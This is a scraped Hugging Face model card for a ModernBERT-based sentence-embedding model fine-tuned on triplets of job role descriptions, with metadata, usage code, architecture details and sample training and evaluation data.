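inputs = tokenizer.apply_chat_template(messages, add_generation_prompt=True, return_tensors="pt").to(model.device)
outputs = model.generate(inputs, max_new_tokens=64)
print(tokenizer.decode(outputs[0][inputs.shape[-1]:], skip_special_tokens=True))
```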
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
dnth/ssf-retriever-modernbert-embed-base-v4.2
|
dnth
| 2025-09-23T15:11:03Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"modernbert",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:7540",
"loss:MultipleNegativesRankingLoss",
"dataset:dnth/ssf-train-valid-v4.2",
"arxiv:1908.10084",
"arxiv:1705.00652",
"base_model:nomic-ai/modernbert-embed-base",
"base_model:finetune:nomic-ai/modernbert-embed-base",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T15:10:12Z |
---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:7540
- loss:MultipleNegativesRankingLoss
base_model: nomic-ai/modernbert-embed-base
widget:
- source_sentence: The Chief Engineer/Senior Engineering Manager (Automatic Fare Collection)
leads and facilitates the implementation of Automatic Fare Collection (AFC) maintenance
regime within the organisation. He/She works closely with the authorities in implementing
new engineering initiatives to enhance the reliability of AFC systems. He demonstrates
his technical expertise in providing advice to cross-disciplinary engineering
studies. His role also includes the establishment of competency standards and
engineering standards to ensure staff are equipped with relevant skills. He excels
in operating in a collaborative environment and functions through his understanding
of the operational activities, industry developments and regulatory requirements.
He maintains a forward-thinking mindset to contribute strategically towards achieving
the department's goals.
sentences:
- The Chief Engineer/Senior Engineering Manager (Rail Signalling Systems) manages
the maintenance and upgrade schedules for rail signalling infrastructure across
the network. He/She partners with transportation authorities to implement new
signalling technologies and provides expert guidance on safety and technical protocols.
This role focuses on developing and enforcing engineering standards specific to
signalling equipment and training personnel accordingly. The manager thrives in
a multidisciplinary team environment, using knowledge of signalling operations,
regulatory mandates, and emerging technologies to ensure system safety and reliability,
while contributing to strategic planning within the transit division.
- The Assistant Horticulturist supports the management and nurturing of plant life
within the organisation’s attraction sites. This role involves assisting in the
upkeep of diverse plant collections and delivering informative presentations to
visitors about the flora and conservation efforts. With keen attention to detail
and a proactive approach, the Assistant Horticulturist monitors plant health and
characteristics, reporting observations accurately. The position requires the
ability to work independently or under supervision, includes physical tasks, and
involves working on a rotating schedule covering weekends, public holidays, and
on-call duties. Extended outdoor work in various weather conditions is expected,
and a valid driving licence may be necessary for duties in expansive park areas.
- The Chief Engineer/Senior Engineering Manager (Automatic Fare Collection) is responsible
for overseeing the deployment and upkeep of the AFC system maintenance program
within the organization. This role involves close collaboration with regulatory
bodies to introduce innovative engineering solutions aimed at improving AFC system
performance and dependability. The incumbent applies deep technical knowledge
to support interdisciplinary engineering projects and leads the formulation of
competency frameworks and technical standards to ensure team proficiency. Operating
effectively in a cooperative setting, the manager leverages insights into operational
workflows, industry trends, and compliance standards, adopting a strategic outlook
to drive the department's long-term objectives.
- source_sentence: The Senior Application Chemist leads technical work and projects
for product development and innovation, and validates the development of application-specific
solutions and new analytical methods, based on technological know-how. He/She
studies market trends and customer needs to assess the feasibility of expanding
existing product lines, in accordance with the organisations business needs. The
Senior Application Chemist supports the technical service team by managing the
execution of technical service, application and product development-related projects
with customers. He also provides technical expertise in troubleshooting technical
issues reported by customers. In addition, he coaches and mentors junior staff
in the application team, and is responsible for managing the teams performance
to achieve organisational goals. The Senior Application Chemist leads a team in
the laboratory, and collaborates closely with the technical service, Research
and Development (R&D), and sales and marketing teams. He is creative and enjoys
solving complex problems. He can manage multiple projects effectively, and possesses
excellent technical writing and presentation skills.
sentences:
- The Relationship Management Director - Commercial leads the development and implementation
of client acquisition strategies, providing clear guidelines to support team members
in cultivating strong client partnerships. This role involves staying informed
about industry trends and sub-sector developments to enhance client service offerings.
The director ensures the team is well-trained on relevant market changes and oversees
credit analysis procedures in compliance with company standards. By guiding and
motivating the team, the director drives performance excellence and fosters a
professional environment that nurtures long-term client engagement. Possessing
keen business insight, the director identifies growth opportunities and influences
stakeholders effectively to achieve business goals, while maintaining a focus
on continuous improvement and team cohesion.
- The Senior Regulatory Affairs Specialist manages compliance projects within the
pharmaceutical industry, ensuring all products meet regional and international
regulatory requirements. This role involves coordinating submissions, monitoring
changes in legislation, and liaising with regulatory authorities to facilitate
product approvals. The Senior Regulatory Affairs Specialist leads a team responsible
for regulatory strategy and documentation, providing training and mentorship to
junior staff. Collaboration with quality assurance, manufacturing, and marketing
teams is essential to maintain adherence to regulatory standards. Strong project
management, attention to detail, and knowledge of regulatory frameworks are critical
for success in this position.
- The Senior Application Chemist is responsible for directing technical projects
and pioneering product innovations while developing and validating new analytical
techniques tailored to specific applications. This role involves analyzing market
trends and customer requirements to determine the potential for expanding product
offerings aligned with corporate objectives. The Senior Application Chemist collaborates
with the technical service team to oversee project execution related to applications
and product development, providing expert guidance in resolving customer technical
challenges. Additionally, the incumbent mentors junior team members, evaluates
team performance, and ensures alignment with organizational targets. Leading a
laboratory team, the Senior Application Chemist works closely with Research and
Development, sales, and marketing departments, demonstrating strong problem-solving
capabilities, effective multitasking, and proficient communication skills in technical
documentation and presentations.
- source_sentence: The Technician (Assembly) performs assembly tasks for aircraft
components in accordance with technical manuals and standard operating procedures
(SOPs). He/She operates workshop equipment, tools and machines for the assembly
of aircraft components. He also keeps abreast of latest developments of related
systems by updating himself through relevant manuals and other publications. He
may be authorised by the organisation to perform quality control functions, including
inspection of incoming materials and assembled components and parts, and registration
of non-conformances. He may also be authorised to perform level 1 non-destructive
testing (NDT) functions under supervision, evaluate for acceptance or rejection,
and record results as specified in the work instructions. He complies with airworthiness
and legislative requirements, and the organisation's safety, health and quality
systems. He supports in implementation of continuous improvement initiatives and
lean practices. He works in a hangar or workshop and may be required to work in
shifts. He should be systematic and detail-oriented, and able to work independently
and in a team to accomplish assigned tasks.
sentences:
- The Technician (Assembly) is responsible for assembling aircraft parts following
detailed technical manuals and established standard operating procedures. This
role involves the operation of various workshop machinery, tools, and equipment
to ensure precise assembly of aircraft components. The Technician stays updated
on the latest system advancements by reviewing relevant technical literature and
manuals. Authorized by the company, the Technician may conduct quality assurance
activities, including inspecting incoming materials and assembled parts, as well
as documenting any non-conformities. Additionally, the Technician may perform
supervised level 1 non-destructive testing (NDT), assessing components for compliance
and accurately recording results in line with work instructions. Compliance with
aviation safety standards, airworthiness regulations, and internal quality and
health protocols is essential. The Technician actively participates in continuous
improvement and lean methodology initiatives. Work is typically carried out in
a workshop or hangar environment, often involving shift work. The ideal candidate
is meticulous, organized, and capable of working autonomously or collaboratively
to complete assigned duties.
- The Assistant Stage Manager supports the Stage Manager throughout all phases of
production, including pre-production planning, rehearsals, live performances,
and post-production tasks. Responsibilities include attending production meetings,
facilitating communication among creative and technical teams, coordinating rehearsal
schedules, preparing and maintaining production documentation, and managing onstage
operations during rehearsals and shows as directed. They may also handle the procurement
and organization of props and costumes, and for extended runs, they might take
on show calling duties or serve as an alternate show caller to ensure seamless
performances.
- The Technician (Assembly) specializes in the repair and maintenance of automotive
engines, utilizing diagnostic tools and automotive repair equipment to troubleshoot
and fix mechanical issues. This role requires familiarity with vehicle service
manuals and adherence to road safety regulations and environmental standards.
The Technician performs routine inspections, identifies faulty parts, and carries
out component replacements to ensure optimal vehicle performance. Responsibilities
include maintaining detailed service records and collaborating with service advisors
to provide customers with accurate repair timelines. Work is conducted primarily
in an automotive workshop, with occasional overtime during peak periods. Strong
problem-solving skills, a customer-focused attitude, and the ability to work independently
or as part of a team are essential for success in this position.
- source_sentence: The Senior Infant Educator plays an active role as a mentor to
the Infant Educator team. He/She takes responsibility for coaching and leading
the infant care team in the Centre. He plays an important role in the design and
implementation of developmentally appropriate curricula and programmes for the
day-to-day developmental and caregiving tasks for infants. He also leads the building
of relationships and partnerships with stakeholders. He designs and implements
family and community programmes, and contributes to the Centres culture of continuous
learning, collaboration and collegiality, in line with its vision, mission and
goals.
sentences:
- The Associate Applications Support Engineer is tasked with maintaining and supporting
key software applications, whether developed internally or sourced from third
parties. This role requires comprehensive knowledge of application functionalities
and backend systems. The engineer collaborates closely with development, transition,
and testing teams to troubleshoot, document, and resolve application issues. Working
within a team environment, the engineer utilizes proficiency in application development
and monitoring tools aligned with organizational standards. Familiarity with the
software platforms hosting the solutions is essential. The role demands strong
analytical abilities, a problem-solving mindset, and excellent communication skills
to effectively address technical challenges.
- The Senior Toddler Educator leads the toddler care team by developing and managing
programmes focused on early childhood literacy and motor skills development. This
role emphasizes coordinating group activities and managing classroom logistics,
while maintaining compliance with childcare regulations specific to toddlers.
The Senior Toddler Educator also oversees staff scheduling and administrative
reporting, working closely with centre management to ensure operational efficiency.
- The Senior Infant Educator serves as a key mentor and leader within the Infant
Educator team, guiding and supporting staff in delivering high-quality infant
care. This role involves overseeing the creation and execution of age-appropriate
curricula and daily caregiving activities tailored to infants’ developmental needs.
Additionally, the Senior Infant Educator fosters strong collaborations with families
and community partners, designs family engagement initiatives, and promotes a
culture of ongoing learning and teamwork aligned with the Centre’s core values
and objectives.
- source_sentence: The Senior Manufacturing Planning Executive formulates production
plans and organises materials, manpower and resources to accomplish manufacturing
functions to fulfil customer and financial commitments. He/She validates the master
production schedule (MPS) and drives adherence of manufacturing works to project
schedules and goals in collaboration with cross-functional leads. He leads material
requirements planning and programme reviews with relevant stakeholders. He is
responsible for optimising supply chain and logistics planning, contract negotiations,
vendor sourcing, inventory planning and control and warehousing operations to
meet manufacturing requirements. He leverages data from supply chain management
(SCM) systems to enhance decision-making and implements supplier capability development
plans to enhance performance. He drives continuous improvements on product on-time
delivery and total available man-hours, develops strategies and priorities for
critical customer issues, facilitates problem-solving, leads in regular reviews
with customers and suppliers, and establishes best practices on process improvements
to enhance productivity. He proactively contributes to the development of lean
and sustainability practices, and conducts research and digital innovation in
targeted areas for continuous process improvements. As a team leader, he appraises
staff performance and conducts coaching and mentoring for planning personnel.
He should possess advanced statistical, forecasting and analytical skills to predict
planning and resource requirements. He is able to drive cross-functional collaboration
between internal and external stakeholders to optimise the planning processes
and ensure maximum resource utilisation.
sentences:
- The Senior Manufacturing Planning Executive develops and implements production
schedules while coordinating materials, workforce, and resources to meet manufacturing
targets aligned with customer demands and financial objectives. This role involves
validating the master production schedule and ensuring manufacturing activities
comply with project timelines through collaboration with various departments.
The executive leads material planning and program assessments with key partners
and is accountable for optimizing supply chain logistics, managing contracts,
sourcing vendors, controlling inventory, and overseeing warehouse operations to
support manufacturing needs. By utilizing supply chain management data, the executive
enhances decision-making and drives supplier capability improvements. They champion
continuous improvements in on-time delivery performance and labor efficiency,
formulate strategies to address critical customer concerns, facilitate problem
resolution, conduct stakeholder reviews, and promote best practices to boost productivity.
Additionally, the role supports lean methodologies and sustainability initiatives,
explores digital innovations, and leads process enhancements. As a leader, the
executive evaluates team performance and provides coaching and mentoring to planning
staff. The position demands strong statistical, forecasting, and analytical expertise
to anticipate planning and resource demands and fosters effective collaboration
among internal and external partners to maximize planning efficiencies.
- The Supervisor (Passenger Services) oversees daily passenger service operations
to ensure compliance with established service quality benchmarks. Collaborating
closely with multiple departments, this role addresses intricate customer concerns
and conducts routine safety and security inspections to uphold a secure workplace.
Serving as a mentor, the Supervisor guides team members and handles conflict resolution,
grievances, and disputes within the team. A comprehensive knowledge of airport
and airline check-in protocols, as well as baggage handling system procedures,
is essential. Operating in shifts to support continuous flight schedules, the
Supervisor acts as a representative for the company’s service standards. The role
demands strong communication, interpersonal, customer service, and leadership
abilities, with an aptitude for working effectively in a diverse, multicultural
environment.
- The Senior Procurement Executive manages the acquisition of goods and services,
negotiates supplier contracts, and oversees vendor relationships to support the
company’s purchasing needs. This role focuses on sourcing strategies, supplier
evaluations, cost analysis, and procurement compliance within the manufacturing
industry. The executive leads procurement planning, coordinates with finance and
operations teams, and ensures timely delivery of purchased materials. They are
responsible for maintaining supplier performance metrics, conducting market research,
and implementing procurement best practices. The role requires strong negotiation
skills, supplier risk management, and contract administration experience. As a
senior professional, the executive supervises procurement staff and drives continuous
improvement initiatives in sourcing processes.
datasets:
- dnth/ssf-train-valid-v4.2
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on nomic-ai/modernbert-embed-base
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [nomic-ai/modernbert-embed-base](https://huggingface.co/nomic-ai/modernbert-embed-base) on the [ssf-train-valid-v4.2](https://huggingface.co/datasets/dnth/ssf-train-valid-v4.2) dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [nomic-ai/modernbert-embed-base](https://huggingface.co/nomic-ai/modernbert-embed-base) <!-- at revision d556a88e332558790b210f7bdbe87da2fa94a8d8 -->
- **Maximum Sequence Length:** 8192 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [ssf-train-valid-v4.2](https://huggingface.co/datasets/dnth/ssf-train-valid-v4.2)
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 8192, 'do_lower_case': False, 'architecture': 'ModernBertModel'})
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
(2): Normalize()
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("dnth/ssf-retriever-modernbert-embed-base-v4.2")
# Run inference
sentences = [
'The Senior Manufacturing Planning Executive formulates production plans and organises materials, manpower and resources to accomplish manufacturing functions to fulfil customer and financial commitments. He/She validates the master production schedule (MPS) and drives adherence of manufacturing works to project schedules and goals in collaboration with cross-functional leads. He leads material requirements planning and programme reviews with relevant stakeholders. He is responsible for optimising supply chain and logistics planning, contract negotiations, vendor sourcing, inventory planning and control and warehousing operations to meet manufacturing requirements. He leverages data from supply chain management (SCM) systems to enhance decision-making and implements supplier capability development plans to enhance performance. He drives continuous improvements on product on-time delivery and total available man-hours, develops strategies and priorities for critical customer issues, facilitates problem-solving, leads in regular reviews with customers and suppliers, and establishes best practices on process improvements to enhance productivity. He proactively contributes to the development of lean and sustainability practices, and conducts research and digital innovation in targeted areas for continuous process improvements. As a team leader, he appraises staff performance and conducts coaching and mentoring for planning personnel. He should possess advanced statistical, forecasting and analytical skills to predict planning and resource requirements. He is able to drive cross-functional collaboration between internal and external stakeholders to optimise the planning processes and ensure maximum resource utilisation.',
'The Senior Manufacturing Planning Executive develops and implements production schedules while coordinating materials, workforce, and resources to meet manufacturing targets aligned with customer demands and financial objectives. This role involves validating the master production schedule and ensuring manufacturing activities comply with project timelines through collaboration with various departments. The executive leads material planning and program assessments with key partners and is accountable for optimizing supply chain logistics, managing contracts, sourcing vendors, controlling inventory, and overseeing warehouse operations to support manufacturing needs. By utilizing supply chain management data, the executive enhances decision-making and drives supplier capability improvements. They champion continuous improvements in on-time delivery performance and labor efficiency, formulate strategies to address critical customer concerns, facilitate problem resolution, conduct stakeholder reviews, and promote best practices to boost productivity. Additionally, the role supports lean methodologies and sustainability initiatives, explores digital innovations, and leads process enhancements. As a leader, the executive evaluates team performance and provides coaching and mentoring to planning staff. The position demands strong statistical, forecasting, and analytical expertise to anticipate planning and resource demands and fosters effective collaboration among internal and external partners to maximize planning efficiencies.',
'The Senior Procurement Executive manages the acquisition of goods and services, negotiates supplier contracts, and oversees vendor relationships to support the company’s purchasing needs. This role focuses on sourcing strategies, supplier evaluations, cost analysis, and procurement compliance within the manufacturing industry. The executive leads procurement planning, coordinates with finance and operations teams, and ensures timely delivery of purchased materials. They are responsible for maintaining supplier performance metrics, conducting market research, and implementing procurement best practices. The role requires strong negotiation skills, supplier risk management, and contract administration experience. As a senior professional, the executive supervises procurement staff and drives continuous improvement initiatives in sourcing processes.',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[1.0000, 0.9240, 0.5197],
# [0.9240, 1.0000, 0.5085],
# [0.5197, 0.5085, 1.0000]])
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### ssf-train-valid-v4.2
* Dataset: [ssf-train-valid-v4.2](https://huggingface.co/datasets/dnth/ssf-train-valid-v4.2) at [97c8b4d](https://huggingface.co/datasets/dnth/ssf-train-valid-v4.2/tree/97c8b4d3dc96a480e369838fb9f00464ce9080e9)
* Size: 7,540 training samples
* Columns: <code>anchor</code>, <code>positive</code>, and <code>negative</code>
* Approximate statistics based on the first 1000 samples:
| | anchor | positive | negative |
|:--------|:-------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 58 tokens</li><li>mean: 167.85 tokens</li><li>max: 355 tokens</li></ul> | <ul><li>min: 58 tokens</li><li>mean: 138.3 tokens</li><li>max: 293 tokens</li></ul> | <ul><li>min: 50 tokens</li><li>mean: 108.71 tokens</li><li>max: 249 tokens</li></ul> |
* Samples:
| anchor | positive | negative |
|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>The Manufacturing Engineer/Production Engineer (Assembly) develops detailed operation and specification sheets throughout the assembly cycle. He/She coordinates shop floor operations and process control, and plans resources to meet production targets. He is conversant with tools and fixtures design and computer integrated manufacturing (CIM) technologies. He determines appropriate resources and processes for engineering application while ensuring working conditions of assembly equipment and machinery. He also manages assembly techniques and verifies conformance of new aircraft components and parts to specifications. He ensures adherence of assembly operations to legislative and airworthiness requirements, as well as with the organisation's standard operating procedures (SOPs), safety, health and quality systems. He identifies opportunities for continuous improvement through data analytics, research and innovation, and implements lean and sustainability practices in assembly. He monitor...</code> | <code>The Manufacturing Engineer (Assembly) is responsible for creating detailed operation and specification documentation for the assembly process. This role involves coordinating shop floor activities and overseeing process controls while managing resource planning to achieve production goals. The engineer applies expertise in tooling and fixture design alongside computer integrated manufacturing (CIM) technologies to determine suitable resources and processes for engineering tasks. Ensuring optimal working conditions for assembly machinery and equipment, the engineer supervises assembly methods and confirms that new aircraft parts meet stringent specification requirements. Compliance with legislative, airworthiness, and organizational standard operating procedures (SOPs), as well as health, safety, and quality management systems, is rigorously maintained. The role focuses on identifying and implementing continuous improvement initiatives through data analysis, innovation, and lean manufac...</code> | <code>The Manufacturing Engineer (Quality Assurance) oversees the inspection and testing of finished products to ensure compliance with quality standards. This role manages quality control procedures throughout the production cycle but does not directly engage in assembly or shop floor coordination. The engineer utilises statistical process control and quality management systems to monitor product conformity, focusing on defect reduction and customer satisfaction. Responsibilities include conducting audits, documenting non-conformance issues, and recommending corrective actions aligned with regulatory requirements and internal policies. While familiar with manufacturing tools and technologies, this position emphasizes quality assurance processes rather than resource planning or tooling design. The engineer collaborates with cross-functional teams to improve product reliability and supports training initiatives on quality standards. Strong analytical skills and attention to detail are necessa...</code> |
| <code>The Linen Room Attendant/Laundry Valet Attendant performs daily assigned duties to support the day-to-day laundry, linen and uniform room operations, ensuring the delivery of clean garments, uniforms, towels and linens to all internal and external customers. He/She collects and delivers guest laundry, performs laundry cleaning, sorts and issues linens and uniforms, and assists in inventory count. He also cleans and maintains laundry equipment and the work area. As part of service delivery, the Linen Room Attendant/Laundry Valet Attendant has to handle guests' requests and respond to their concerns and feedback in a professional and courteous manner. He complies with organisational guidelines and regulations on hygiene and workplace safety and health, and reports safety hazards observed to ensure workplace safety and security. He is a team player with a high level of attentiveness to details and good communication skills to interact with guests and all levels of staff. He works on shift...</code> | <code>The Linen Room Attendant/Laundry Valet Attendant is responsible for supporting daily operations in the laundry, linen, and uniform rooms by ensuring prompt and efficient delivery of cleaned garments, towels, uniforms, and linens to both internal departments and external guests. This role involves collecting and returning guest laundry, sorting and distributing linens and uniforms, conducting inventory checks, and maintaining cleanliness of laundry equipment and workspaces. The attendant addresses guest inquiries and concerns professionally and courteously, adheres to hygiene and workplace safety standards, and promptly reports any safety issues. This position requires teamwork, attention to detail, effective communication skills, and physical stamina to handle tasks such as standing, walking, and lifting heavy laundry loads throughout shifts that may include weekends and public holidays.</code> | <code>The Linen Room Supervisor oversees the strategic planning and management of laundry services within a hotel, leading a team of attendants and coordinating with multiple departments to optimize operational efficiency. This senior role involves budgeting, staff training, and implementing quality control measures rather than performing hands-on laundry tasks. The supervisor is responsible for developing service standards, managing vendor relationships, and ensuring compliance with corporate policies, with minimal direct involvement in daily linen sorting or equipment maintenance. Strong leadership, decision-making capabilities, and experience in workforce management are essential, while physical demands are limited compared to frontline laundry roles.</code> |
| <code>The General Worker / Operator performs general duties, and cleaning and housekeeping tasks as assigned. He/She is required to assist in operating machinery under supervision and moving aircraft components, equipment and materials from the store to respective work areas. He is expected to adhere to the organisation's standard operating procedures (SOPs), and safety, health and quality systems. He supports in implementation of continuous improvement initiatives to ensure workspace efficiency and effectiveness. He works in a hangar or workshop and may be required to work in shifts. He should be comfortable with repetitive work activities and exposure to physically demanding work conditions such as long standing hours and extreme temperatures.</code> | <code>The General Worker / Operator is responsible for carrying out various general tasks including cleaning and housekeeping duties as directed. This role involves assisting with machinery operation under guidance and transporting aircraft parts, equipment, and supplies from storage to designated work areas. The incumbent must strictly follow the company’s standard operating procedures, along with safety, health, and quality protocols. They contribute to continuous improvement efforts aimed at enhancing workspace productivity and efficiency. The position is based in a hangar or workshop environment and may require shift work. The ideal candidate should be able to handle repetitive tasks and endure physically challenging conditions such as prolonged standing and exposure to temperature extremes.</code> | <code>The Warehouse Clerk manages inventory records and coordinates the receipt and dispatch of goods within the logistics sector. This role requires proficiency in inventory management software and strong organizational skills to maintain stock accuracy. The Warehouse Clerk operates in a distribution center and collaborates closely with supply chain teams to ensure timely delivery schedules. The position demands attention to detail and the ability to work under pressure but does not involve machinery operation or physically strenuous activities common in manufacturing environments.</code> |
* Loss: [<code>MultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#multiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"gather_across_devices": false
}
```
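For reference, a minimal sketch of instantiating this loss with the parameters above, using the standard Sentence Transformers API:
```python
from sentence_transformers import SentenceTransformer, losses, util

model = SentenceTransformer("nomic-ai/modernbert-embed-base")
# scale=20.0 and cosine similarity mirror the parameters listed above;
# in-batch negatives come from the (anchor, positive, negative) triplets.
loss = losses.MultipleNegativesRankingLoss(model, scale=20.0, similarity_fct=util.cos_sim)
```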
### Evaluation Dataset
#### ssf-train-valid-v4.2
* Dataset: [ssf-train-valid-v4.2](https://huggingface.co/datasets/dnth/ssf-train-valid-v4.2) at [97c8b4d](https://huggingface.co/datasets/dnth/ssf-train-valid-v4.2/tree/97c8b4d3dc96a480e369838fb9f00464ce9080e9)
* Size: 1,885 evaluation samples
* Columns: <code>anchor</code>, <code>positive</code>, and <code>negative</code>
* Approximate statistics based on the first 1000 samples:
| | anchor | positive | negative |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 60 tokens</li><li>mean: 170.26 tokens</li><li>max: 403 tokens</li></ul> | <ul><li>min: 59 tokens</li><li>mean: 138.72 tokens</li><li>max: 265 tokens</li></ul> | <ul><li>min: 50 tokens</li><li>mean: 109.98 tokens</li><li>max: 252 tokens</li></ul> |
* Samples:
| anchor | positive | negative |
|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>The Technician (Signal and Communications) works in a team to perform preventive and corrective maintenance of signal, communication and control systems, to improve the reliability of signal, communication and control systems. He/She assists in the preparation of maintenance activities and is technically inclined and adept in handling electronics and computer-based systems and equipment for maintenance. He also supervises the work of contractors and external stakeholders in ensuring adherence to operating requirements and safety standards. He may be required to perform shift duties at various rail premises such as workshops, depots, train stations, and train tunnels. He is capable of communicating effectively within the team, is able to multi-task and can prioritises his assigned maintenance workload in supporting maintenance activities.</code> | <code>The Technician (Signal and Communications) collaborates within a team to conduct routine and emergency maintenance on signal, communication, and control infrastructures, aiming to enhance system reliability. This role involves assisting in the planning of maintenance operations and requires strong technical skills in electronics and computer-based maintenance tools. The technician oversees contractors and external partners to ensure compliance with operational protocols and safety guidelines. Shift work at various rail facilities, including workshops, depots, stations, and tunnels, may be necessary. Effective team communication, multitasking abilities, and prioritization of maintenance tasks are essential to support ongoing maintenance efforts.</code> | <code>The Technician (Electrical Installations) is responsible for installing and testing electrical wiring and equipment in residential and commercial buildings. They prepare site layouts, follow electrical codes, and ensure safety during installation processes. The technician coordinates with suppliers and clients but does not engage in signal or communication system maintenance. Shift work is generally not required, and the role focuses on hands-on installation rather than supervising external contractors. Strong knowledge of electrical wiring, circuit breakers, and household electrical standards is necessary, along with good communication skills to liaise with homeowners and site managers.</code> |
| <code>The Visual Merchandiser manages shopper marketing activities and is responsible for the conceptualisation of the visual merchandising plans. He/she oversees the set-up of merchandise display by coaching in-store teams. He is also responsible for market research efforts relating to visual merchandising. He operates in a fast-paced and creative environment where he conceptualises eye-catching product displays, store layouts and designs to promote the store's products. He is creative, detail-oriented and is effective working within tight deadlines. He is able to effectively prioritise multiple assignments and possesses an aesthetic flair.</code> | <code>The Visual Merchandiser is responsible for planning and executing shopper marketing strategies through innovative visual displays. This role involves guiding retail teams in arranging merchandise presentations and ensuring the store environment is appealing and aligned with brand standards. The Visual Merchandiser conducts market research to stay updated on trends and consumer preferences, working in a dynamic, fast-paced setting that demands creativity and precision. Strong organizational skills and an eye for design are essential to manage multiple projects and deliver compelling store layouts that enhance customer engagement.</code> | <code>The Visual Merchandiser leads the digital marketing campaigns for retail brands, focusing on online shopper engagement and social media promotions. He/she develops content strategies, coordinates with creative teams, and analyses ecommerce data to optimise product visibility. Operating in a technology-driven environment, the Visual Merchandiser applies analytical skills and marketing knowledge to influence buying behaviour through digital channels rather than physical displays. This role requires proficiency in digital tools and a strong understanding of consumer analytics rather than traditional visual merchandising techniques.</code> |
